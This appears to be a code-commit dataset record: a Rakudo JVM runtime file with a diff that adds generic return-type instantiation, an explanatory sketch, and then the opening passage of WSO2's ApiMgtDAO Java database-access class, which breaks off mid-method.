final CallSiteDescriptor rvThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); if (rtype != null) { SixModelObject decontValue = Ops.decont(rv, tc); if (Ops.istype(decontValue, rtype, tc) == 0) { /* Straight type check failed, but it's possible we're returning * an Int that can unbox into an int or similar. 
*/ StorageSpec spec = rtype.st.REPR.get_storage_spec(tc, rtype.st); if (spec.inlineable == 0 || Ops.istype(rtype, decontValue.st.WHAT, tc) == 0) { if (Ops.istype(decontValue.st.WHAT, bypassType, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Return"); if (thrower == null) throw ExceptionHandling.dieInternal(tc, "Type check failed for return value"); else Ops.invokeDirect(tc, thrower, rvThrower, new Object[] { decontValue, rtype }); } } } } return rv; } private static final CallSiteDescriptor baThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6bindassert(SixModelObject value, SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (type != gcx.Mu) { SixModelObject decont = Ops.decont(value, tc); if (Ops.istype(decont, type, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Binding"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Type check failed in binding"); else Ops.invokeDirect(tc, thrower, baThrower, new Object[] { value, type }); } } return value; } public static SixModelObject p6capturelex(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); StaticCodeInfo wantedStaticInfo = closure.staticInfo.outerStaticInfo; if (tc.curFrame.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame; else if (tc.curFrame.outer.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame.outer; return codeObj; } public static SixModelObject p6getouterctx(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); codeObj = Ops.decont(codeObj, tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = closure.outer; return wrap; } public static SixModelObject p6captureouters2(SixModelObject capList, SixModelObject target, ThreadContext tc) { if (!(target instanceof CodeRef)) ExceptionHandling.dieInternal(tc, "p6captureouters target must be a CodeRef"); CallFrame cf = ((CodeRef)target).outer; if (cf == null) return capList; long elems = capList.elems(tc); for (long i = 0; i < elems; i++) { SixModelObject closure = capList.at_pos_boxed(tc, i); CallFrame ctxToDiddle = ((CodeRef)closure).outer; ctxToDiddle.outer = cf; } return capList; } public static SixModelObject p6bindattrinvres(SixModelObject obj, SixModelObject ch, String name, SixModelObject value, ThreadContext tc) { obj.bind_attribute_boxed(tc, Ops.decont(ch, tc), name, STable.NO_HINT, value); if (obj.sc != null) Ops.scwbObject(tc, obj); return obj; } public static SixModelObject getThrower(ThreadContext tc, String type) { SixModelObject exHash = Ops.gethllsym("Raku", "P6EX", tc); return exHash == null ? 
null : Ops.atkey(exHash, type, tc); } private static CallFrame find_common_ctx(CallFrame ctx1, CallFrame ctx2) { int depth1 = 0; int depth2 = 0; CallFrame ctx; for (ctx = ctx1; ctx != null; ctx = ctx.caller, depth1++) if (ctx == ctx2) return ctx; for (ctx = ctx2; ctx != null; ctx = ctx.caller, depth2++) if (ctx == ctx1) return ctx; for (; depth1 > depth2; depth2++) ctx1 = ctx1.caller; for (; depth2 > depth1; depth1++) ctx2 = ctx2.caller; while (ctx1 != ctx2) { ctx1 = ctx1.caller; ctx2 = ctx2.caller; } return ctx1; } private static SixModelObject getremotelex(CallFrame pad, String name) { /* use for sub_find_pad */ CallFrame curFrame = pad; while (curFrame != null) { Integer found = curFrame.codeRef.staticInfo.oTryGetLexicalIdx(name); if (found != null) return curFrame.oLex[found]; curFrame = curFrame.outer; } return null; } public static String tclc(String in, ThreadContext tc) { if (in.length() == 0) return in; int first = in.codePointAt(0); return new String(Character.toChars(Character.toTitleCase(first))) + in.substring(Character.charCount(first)).toLowerCase(); } public static long p6stateinit(ThreadContext tc) { return tc.curFrame.stateInit ? 1 : 0; } public static SixModelObject p6setfirstflag(SixModelObject codeObj, ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.firstPhaserCodeBlock = codeObj; return codeObj; } public static long p6takefirstflag(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); boolean matches = tcx.firstPhaserCodeBlock == tc.curFrame.codeRef; tcx.firstPhaserCodeBlock = null; return matches ? 1 : 0; } public static SixModelObject p6setpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.add(tc.curFrame); return null; } public static SixModelObject p6clearpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.remove(tc.curFrame); return null; } public static long p6inpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); return tcx.prePhaserFrames.remove(tc.curFrame.caller) ? 1 : 0; } private static final CallSiteDescriptor dispVivifier = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor dispThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_STR }, null); public static SixModelObject p6finddispatcher(String usage, ThreadContext tc) { SixModelObject dispatcher = null; CallFrame ctx = tc.curFrame.caller; while (ctx != null) { /* Do we have a dispatcher here? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher != null) { dispatcher = maybeDispatcher; if (dispatcher instanceof TypeObject) { /* Need to vivify it. */ SixModelObject meth = Ops.findmethod(dispatcher, "vivify_for", tc); SixModelObject p6sub = ctx.codeRef.codeObject; SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = ctx; SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; Ops.invokeDirect(tc, meth, dispVivifier, new Object[] { dispatcher, p6sub, wrap, cc }); dispatcher = Ops.result_o(tc.curFrame); ctx.oLex[dispLexIdx] = dispatcher; } break; } } /* Follow dynamic chain. 
*/ ctx = ctx.caller; } if (dispatcher == null) { SixModelObject thrower = getThrower(tc, "X::NoDispatcher"); if (thrower == null) { ExceptionHandling.dieInternal(tc, usage + " is not in the dynamic scope of a dispatcher"); } else { Ops.invokeDirect(tc, thrower, dispThrower, new Object[] { usage }); } } return dispatcher; } public static SixModelObject p6argsfordispatcher(SixModelObject disp, ThreadContext tc) { SixModelObject result = null; CallFrame ctx = tc.curFrame; while (ctx != null) { /* Do we have the dispatcher we're looking for? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher == disp) { /* Found; grab args. */ SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; result = cc; break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (result == null) throw ExceptionHandling.dieInternal(tc, "Could not find arguments for dispatcher"); return result; } public static SixModelObject p6staticouter(SixModelObject code, ThreadContext tc) { if (code instanceof CodeRef) return ((CodeRef)code).staticInfo.outerStaticInfo.staticCode; else throw ExceptionHandling.dieInternal(tc, "p6staticouter must be used on a CodeRef"); } public static SixModelObject jvmrakudointerop(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return BootJavaInterop.RuntimeSupport.boxJava(gcx.rakudoInterop, gcx.rakudoInterop.getSTableForClass(RakudoJavaInterop.class)); } }
[JVM] Make generics work with return type in sigs (#5080) This ports the changes made to src/vm/moar/Perl6/Ops.nqp in https://github.com/rakudo/rakudo/pull/5048 over to the JVM backend.
src/vm/jvm/runtime/org/raku/rakudo/RakOps.java
[JVM] Make generics work with return type in sigs (#5080)
<ide><path>rc/vm/jvm/runtime/org/raku/rakudo/RakOps.java <ide> return cont; <ide> } <ide> <add> private static final CallSiteDescriptor genIns = new CallSiteDescriptor( <add> new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); <ide> private static final CallSiteDescriptor rvThrower = new CallSiteDescriptor( <ide> new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); <ide> public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { <ide> SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); <ide> SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); <ide> if (rtype != null) { <add> /* The return type could be generic. In that case we have <add> * to call instantiate_generic before doing the type check. */ <add> SixModelObject HOW = rtype.st.HOW; <add> SixModelObject archetypesMeth = Ops.findmethod(HOW, "archetypes", tc); <add> Ops.invokeDirect(tc, archetypesMeth, Ops.invocantCallSite, new Object[] { HOW, rtype }); <add> SixModelObject Archetypes = Ops.result_o(tc.curFrame); <add> SixModelObject genericMeth = Ops.findmethodNonFatal(Archetypes, "generic", tc); <add> if (genericMeth != null) { <add> Ops.invokeDirect(tc, genericMeth, Ops.invocantCallSite, new Object[] { Archetypes }); <add> if (Ops.istrue(Ops.result_o(tc.curFrame), tc) == 1) { <add> SixModelObject ig = Ops.findmethod(HOW, "instantiate_generic", tc); <add> SixModelObject ContextRef = tc.gc.ContextRef; <add> SixModelObject cc = ContextRef.st.REPR.allocate(tc, ContextRef.st); <add> ((ContextRefInstance)cc).context = tc.curFrame; <add> Ops.invokeDirect(tc, ig, genIns, new Object[] { HOW, rtype, cc }); <add> rtype = Ops.result_o(tc.curFrame); <add> } <add> } <add> <ide> SixModelObject decontValue = Ops.decont(rv, tc); <ide> if (Ops.istype(decontValue, rtype, tc) == 0) { <ide> /* Straight type check failed, but it's possible we're returning
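The diff above makes p6typecheckrv ask the return type's HOW whether it is generic and, if so, instantiate it against the current call frame (via instantiate_generic) before running the usual istype check. As a rough illustration of that ordering only, here is a minimal, self-contained plain-Java sketch; the class TypeHandle and its methods isGeneric, instantiateAgainst, and accepts are hypothetical stand-ins for this sketch and are not part of the Rakudo/NQP runtime API.

import java.util.Map;

// Hypothetical stand-ins used purely to illustrate the ordering of checks the
// patched p6typecheckrv performs: resolve a generic return type first, then
// run the normal "is the return value of the declared type?" test.
final class TypeHandle {
    final String name;
    final boolean generic;
    TypeHandle(String name, boolean generic) { this.name = name; this.generic = generic; }

    boolean isGeneric() { return generic; }

    // "Instantiation" here just looks the concrete type up in the caller's context,
    // standing in for HOW.instantiate_generic(type, callerContext).
    TypeHandle instantiateAgainst(Map<String, TypeHandle> callerContext) {
        TypeHandle concrete = callerContext.get(name);
        return concrete != null ? concrete : this;
    }

    // Toy membership test; the real code consults the meta-object protocol (Ops.istype).
    boolean accepts(Object value) {
        return value != null && value.getClass().getSimpleName().equals(name);
    }
}

public class ReturnCheckSketch {
    static Object checkReturn(Object rv, TypeHandle declared, Map<String, TypeHandle> callerContext) {
        TypeHandle effective = declared.isGeneric()
                ? declared.instantiateAgainst(callerContext)   // mirrors the new instantiate_generic step
                : declared;
        if (!effective.accepts(rv)) {
            throw new IllegalStateException("Type check failed for return value");
        }
        return rv;
    }

    public static void main(String[] args) {
        // The caller's context binds the generic "T" to Integer, so returning an Integer passes.
        Map<String, TypeHandle> ctx = Map.of("T", new TypeHandle("Integer", false));
        System.out.println(checkReturn(42, new TypeHandle("T", true), ctx)); // prints 42
    }
}

Running the sketch prints 42 because the caller's context resolves the generic T to Integer before the acceptance test, which is the same ordering the patch introduces: instantiate the declared return type against the current frame, then type-check the deconted return value.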
Java
apache-2.0
bed3981ca678245472725d8c1845857669803b0c
0
chamilaadhi/carbon-apimgt,praminda/carbon-apimgt,tharindu1st/carbon-apimgt,jaadds/carbon-apimgt,praminda/carbon-apimgt,tharikaGitHub/carbon-apimgt,wso2/carbon-apimgt,Rajith90/carbon-apimgt,tharindu1st/carbon-apimgt,ruks/carbon-apimgt,harsha89/carbon-apimgt,jaadds/carbon-apimgt,harsha89/carbon-apimgt,tharindu1st/carbon-apimgt,uvindra/carbon-apimgt,tharikaGitHub/carbon-apimgt,praminda/carbon-apimgt,harsha89/carbon-apimgt,jaadds/carbon-apimgt,isharac/carbon-apimgt,bhathiya/carbon-apimgt,fazlan-nazeem/carbon-apimgt,chamilaadhi/carbon-apimgt,bhathiya/carbon-apimgt,wso2/carbon-apimgt,malinthaprasan/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,fazlan-nazeem/carbon-apimgt,isharac/carbon-apimgt,bhathiya/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,prasa7/carbon-apimgt,uvindra/carbon-apimgt,uvindra/carbon-apimgt,chamilaadhi/carbon-apimgt,pubudu538/carbon-apimgt,nuwand/carbon-apimgt,nuwand/carbon-apimgt,wso2/carbon-apimgt,fazlan-nazeem/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,ruks/carbon-apimgt,tharikaGitHub/carbon-apimgt,prasa7/carbon-apimgt,tharindu1st/carbon-apimgt,ruks/carbon-apimgt,nuwand/carbon-apimgt,chamindias/carbon-apimgt,fazlan-nazeem/carbon-apimgt,chamindias/carbon-apimgt,pubudu538/carbon-apimgt,harsha89/carbon-apimgt,malinthaprasan/carbon-apimgt,bhathiya/carbon-apimgt,Rajith90/carbon-apimgt,Rajith90/carbon-apimgt,Rajith90/carbon-apimgt,malinthaprasan/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,jaadds/carbon-apimgt,uvindra/carbon-apimgt,prasa7/carbon-apimgt,malinthaprasan/carbon-apimgt,isharac/carbon-apimgt,prasa7/carbon-apimgt,chamilaadhi/carbon-apimgt,isharac/carbon-apimgt,tharikaGitHub/carbon-apimgt,pubudu538/carbon-apimgt,pubudu538/carbon-apimgt,nuwand/carbon-apimgt,chamindias/carbon-apimgt,ruks/carbon-apimgt,chamindias/carbon-apimgt,wso2/carbon-apimgt
/* * Copyright (c) 2005-2011, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.apimgt.impl.dao; import com.google.common.base.Splitter; import com.google.common.collect.Lists; import org.apache.commons.lang.StringUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.apimgt.api.APIManagementException; import org.wso2.carbon.apimgt.api.BlockConditionAlreadyExistsException; import org.wso2.carbon.apimgt.api.SubscriptionAlreadyExistingException; import org.wso2.carbon.apimgt.api.dto.ConditionDTO; import org.wso2.carbon.apimgt.api.dto.ConditionGroupDTO; import org.wso2.carbon.apimgt.api.dto.UserApplicationAPIUsage; import org.wso2.carbon.apimgt.api.model.API; import org.wso2.carbon.apimgt.api.model.APIIdentifier; import org.wso2.carbon.apimgt.api.model.APIKey; import org.wso2.carbon.apimgt.api.model.APIProduct; import org.wso2.carbon.apimgt.api.model.APIProductIdentifier; import org.wso2.carbon.apimgt.api.model.APIProductResource; import org.wso2.carbon.apimgt.api.model.APIStatus; import org.wso2.carbon.apimgt.api.model.APIStore; import org.wso2.carbon.apimgt.api.model.AccessTokenInfo; import org.wso2.carbon.apimgt.api.model.Application; import org.wso2.carbon.apimgt.api.model.ApplicationConstants; import org.wso2.carbon.apimgt.api.model.BlockConditionsDTO; import org.wso2.carbon.apimgt.api.model.Comment; import org.wso2.carbon.apimgt.api.model.KeyManager; import org.wso2.carbon.apimgt.api.model.Label; import org.wso2.carbon.apimgt.api.model.LifeCycleEvent; import org.wso2.carbon.apimgt.api.model.OAuthAppRequest; import org.wso2.carbon.apimgt.api.model.OAuthApplicationInfo; import org.wso2.carbon.apimgt.api.model.Scope; import org.wso2.carbon.apimgt.api.model.SubscribedAPI; import org.wso2.carbon.apimgt.api.model.Subscriber; import org.wso2.carbon.apimgt.api.model.Tier; import org.wso2.carbon.apimgt.api.model.URITemplate; import org.wso2.carbon.apimgt.api.model.policy.APIPolicy; import org.wso2.carbon.apimgt.api.model.policy.ApplicationPolicy; import org.wso2.carbon.apimgt.api.model.policy.BandwidthLimit; import org.wso2.carbon.apimgt.api.model.policy.Condition; import org.wso2.carbon.apimgt.api.model.policy.GlobalPolicy; import org.wso2.carbon.apimgt.api.model.policy.HeaderCondition; import org.wso2.carbon.apimgt.api.model.policy.IPCondition; import org.wso2.carbon.apimgt.api.model.policy.JWTClaimsCondition; import org.wso2.carbon.apimgt.api.model.policy.Pipeline; import org.wso2.carbon.apimgt.api.model.policy.Policy; import org.wso2.carbon.apimgt.api.model.policy.PolicyConstants; import org.wso2.carbon.apimgt.api.model.policy.QueryParameterCondition; import org.wso2.carbon.apimgt.api.model.policy.QuotaPolicy; import org.wso2.carbon.apimgt.api.model.policy.RequestCountLimit; import org.wso2.carbon.apimgt.api.model.policy.SubscriptionPolicy; import org.wso2.carbon.apimgt.impl.APIConstants; import 
org.wso2.carbon.apimgt.impl.APIManagerConfiguration; import org.wso2.carbon.apimgt.impl.ThrottlePolicyConstants; import org.wso2.carbon.apimgt.impl.dao.constants.SQLConstants; import org.wso2.carbon.apimgt.impl.dto.APIInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyValidationInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APISubscriptionInfoDTO; import org.wso2.carbon.apimgt.impl.dto.ApplicationRegistrationWorkflowDTO; import org.wso2.carbon.apimgt.impl.dto.TierPermissionDTO; import org.wso2.carbon.apimgt.impl.dto.WorkflowDTO; import org.wso2.carbon.apimgt.impl.factory.KeyManagerHolder; import org.wso2.carbon.apimgt.impl.factory.SQLConstantManagerFactory; import org.wso2.carbon.apimgt.impl.internal.ServiceReferenceHolder; import org.wso2.carbon.apimgt.impl.utils.APIMgtDBUtil; import org.wso2.carbon.apimgt.impl.utils.APIUtil; import org.wso2.carbon.apimgt.impl.utils.APIVersionComparator; import org.wso2.carbon.apimgt.impl.utils.ApplicationUtils; import org.wso2.carbon.apimgt.impl.utils.LRUCache; import org.wso2.carbon.apimgt.impl.utils.RemoteUserManagerClient; import org.wso2.carbon.apimgt.impl.workflow.WorkflowConstants; import org.wso2.carbon.apimgt.impl.workflow.WorkflowExecutorFactory; import org.wso2.carbon.apimgt.impl.workflow.WorkflowStatus; import org.wso2.carbon.core.util.CryptoException; import org.wso2.carbon.identity.core.util.IdentityTenantUtil; import org.wso2.carbon.identity.core.util.IdentityUtil; import org.wso2.carbon.identity.oauth.IdentityOAuthAdminException; import org.wso2.carbon.user.core.util.UserCoreUtil; import org.wso2.carbon.utils.DBUtils; import org.wso2.carbon.utils.multitenancy.MultitenantConstants; import org.wso2.carbon.utils.multitenancy.MultitenantUtils; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.math.BigDecimal; import java.nio.charset.Charset; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.sql.Timestamp; import java.sql.Types; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.UUID; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * This class represent the ApiMgtDAO. */ public class ApiMgtDAO { private static final Log log = LogFactory.getLog(ApiMgtDAO.class); private static ApiMgtDAO INSTANCE = null; private boolean forceCaseInsensitiveComparisons = false; private boolean multiGroupAppSharingEnabled = false; private static boolean initialAutoCommit = false; private final Object scopeMutex = new Object(); private ApiMgtDAO() { APIManagerConfiguration configuration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration(); String caseSensitiveComparison = ServiceReferenceHolder.getInstance(). 
getAPIManagerConfigurationService().getAPIManagerConfiguration().getFirstProperty(APIConstants.API_STORE_FORCE_CI_COMPARISIONS); if (caseSensitiveComparison != null) { forceCaseInsensitiveComparisons = Boolean.parseBoolean(caseSensitiveComparison); } multiGroupAppSharingEnabled = APIUtil.isMultiGroupAppSharingEnabled(); } public List<String> getAPIVersionsMatchingApiName(String apiName, String username) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; List<String> versionList = new ArrayList<String>(); ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_VERSIONS_MATCHES_API_NAME_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, username); resultSet = ps.executeQuery(); while (resultSet.next()) { versionList.add(resultSet.getString("API_VERSION")); } } catch (SQLException e) { handleException("Failed to get API versions matches API name" + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return versionList; } /** * Method to get the instance of the ApiMgtDAO. * * @return {@link ApiMgtDAO} instance */ public static ApiMgtDAO getInstance() { if (INSTANCE == null) { INSTANCE = new ApiMgtDAO(); } return INSTANCE; } /** * Persist the details of the token generation request (allowed domains & validity period) to be used back * when approval has been granted. * * @param dto DTO related to Application Registration. * @param onlyKeyMappingEntry When this flag is enabled, only AM_APPLICATION_KEY_MAPPING will get affected. * @throws APIManagementException if failed to create entries in AM_APPLICATION_REGISTRATION and * AM_APPLICATION_KEY_MAPPING tables. */ public void createApplicationRegistrationEntry(ApplicationRegistrationWorkflowDTO dto, boolean onlyKeyMappingEntry) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement queryPs = null; PreparedStatement appRegPs = null; ResultSet resultSet = null; Application application = dto.getApplication(); Subscriber subscriber = application.getSubscriber(); String jsonString = dto.getAppInfoDTO().getOAuthApplicationInfo().getJsonString(); String registrationQuery = SQLConstants.GET_APPLICATION_REGISTRATION_SQL; String registrationEntry = SQLConstants.ADD_APPLICATION_REGISTRATION_SQL; String keyMappingEntry = SQLConstants.ADD_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); queryPs = conn.prepareStatement(registrationQuery); queryPs.setInt(1, subscriber.getId()); queryPs.setInt(2, application.getId()); queryPs.setString(3, dto.getKeyType()); resultSet = queryPs.executeQuery(); if (resultSet.next()) { throw new APIManagementException("Application '" + application.getName() + "' is already registered."); } if (!onlyKeyMappingEntry) { appRegPs = conn.prepareStatement(registrationEntry); appRegPs.setInt(1, subscriber.getId()); appRegPs.setString(2, dto.getWorkflowReference()); appRegPs.setInt(3, application.getId()); appRegPs.setString(4, dto.getKeyType()); appRegPs.setString(5, dto.getDomainList()); appRegPs.setLong(6, dto.getValidityTime()); appRegPs.setString(7, (String) dto.getAppInfoDTO().getOAuthApplicationInfo().getParameter("tokenScope")); appRegPs.setString(8, jsonString); appRegPs.execute(); } ps = conn.prepareStatement(keyMappingEntry); ps.setInt(1, application.getId()); ps.setString(2, dto.getKeyType()); ps.setString(3, dto.getStatus().toString()); ps.execute(); conn.commit(); } catch (SQLException 
e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Application Registration", e1); } handleException("Error occurred while creating an " + "Application Registration Entry for Application : " + application.getName(), e); } finally { APIMgtDBUtil.closeStatement(queryPs); APIMgtDBUtil.closeStatement(appRegPs); APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } public OAuthApplicationInfo getOAuthApplication(String consumerKey) throws APIManagementException { OAuthApplicationInfo oAuthApplicationInfo = new OAuthApplicationInfo(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_OAUTH_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { oAuthApplicationInfo.setClientId(consumerKey); oAuthApplicationInfo.setCallBackURL(rs.getString("CALLBACK_URL")); oAuthApplicationInfo.setClientSecret(APIUtil.decryptToken(rs.getString("CONSUMER_SECRET"))); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_REDIRECT_URIS, rs.getString ("CALLBACK_URL")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_NAME, rs.getString("APP_NAME")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_GRANT, rs.getString("GRANT_TYPES")); } } catch (SQLException e) { handleException("Error while executing SQL for getting OAuth application info", e); } catch (CryptoException e) { handleException("Unable to decrypt consumer secret of consumer key " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return oAuthApplicationInfo; } /** * Get the creator of the OAuth App. * * @param consumerKey Client ID of the OAuth App * @return {@code Subscriber} with name and TenantId set. 
* @throws APIManagementException */ public Subscriber getOwnerForConsumerApp(String consumerKey) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String username; Subscriber subscriber = null; String sqlQuery = SQLConstants.GET_OWNER_FOR_CONSUMER_APP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { username = rs.getString("USERNAME"); String domainName = rs.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); subscriber = new Subscriber(endUsernameWithDomain); subscriber.setTenantId(rs.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Error while executing SQL for getting User Id : SQL " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return subscriber; } /** * Get Subscribed APIs for given userId * * @param userId id of the user * @return APIInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APIInfoDTO[] getSubscribedAPIsOfUser(String userId) throws APIManagementException { List<APIInfoDTO> apiInfoDTOList = new ArrayList<APIInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(loginUserName); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, tenantAwareUsername); ps.setInt(2, tenantId); rs = ps.executeQuery(); while (rs.next()) { APIInfoDTO infoDTO = new APIInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setVersion(rs.getString("API_VERSION")); apiInfoDTOList.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiInfoDTOList.toArray(new APIInfoDTO[apiInfoDTOList.size()]); } /** * Get API key information for given API * * @param apiInfoDTO API info * @return APIKeyInfoDTO[] * @throws APIManagementException if failed to get key info for given API */ public APIKeyInfoDTO[] getSubscribedUsersForAPI(APIInfoDTO apiInfoDTO) throws APIManagementException { APIKeyInfoDTO[] apiKeyInfoDTOs = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; List<APIKeyInfoDTO> apiKeyInfoList = new ArrayList<APIKeyInfoDTO>(); String sqlQuery = SQLConstants.GET_SUBSCRIBED_USERS_FOR_API_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(2, apiInfoDTO.getApiName()); ps.setString(3, apiInfoDTO.getVersion()); rs = ps.executeQuery(); while (rs.next()) { String userId = rs.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID); APIKeyInfoDTO apiKeyInfoDTO = new APIKeyInfoDTO(); apiKeyInfoDTO.setUserId(userId); apiKeyInfoList.add(apiKeyInfoDTO); } apiKeyInfoDTOs = apiKeyInfoList.toArray(new APIKeyInfoDTO[apiKeyInfoList.size()]); } catch 